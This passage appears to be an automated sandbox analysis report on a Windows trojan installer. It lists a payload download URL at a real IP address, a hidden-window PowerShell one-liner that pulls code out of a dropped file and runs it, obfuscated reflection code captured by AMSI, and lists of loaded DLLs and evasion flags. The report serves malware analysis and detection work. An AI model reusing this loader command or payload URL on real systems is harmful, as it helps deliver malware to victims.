6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Date: Wed, 08 Jan 2025 15:32:19 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin$
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin1
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin4
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin:#
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bin=mS
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binB
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binD
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binGl
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binL
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binS
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binT
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.bind
    Source: msiexec.exe, 00000005.00000002.3884234699.00000000047EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binf
    Source: msiexec.exe, 00000005.00000002.3884234699.0000000004805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.94/hapaASjpjADwmkbMzkaWEdnWGbt71.binl
    Source: rArz0wnYVU.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004068460_2_00406846
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_00404C590_2_00404C59
    Source: rArz0wnYVU.exeStatic PE information: invalid certificate
    Source: rArz0wnYVU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@17/14@0/1
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2684:120:WilError_03
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeFile created: C:\Users\user\AppData\Local\Temp\nsq728.tmpJump to behavior
    Source: rArz0wnYVU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: rArz0wnYVU.exeReversingLabs: Detection: 23%
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeFile read: C:\Users\user\Desktop\rArz0wnYVU.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\rArz0wnYVU.exe "C:\Users\user\Desktop\rArz0wnYVU.exe"
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas)Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: rArz0wnYVU.exeStatic file information: File size 1062792 > 1048576
    Source: rArz0wnYVU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000005.00000002.3883422466.000000000398C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Outline $Tvanmeldelserne $Rachiococainize), (Pondokkie @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Wamefous = [AppDomain]::CurrentDomain.GetAssemblies(
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Poaceae)), $Kickee).DefineDynamicModule($Chapiter, $false).DefineType($Kontinentalsoklers, $smrelsen, [System.MulticastDelegate])$Borg
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas)
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas)Jump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\rArz0wnYVU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
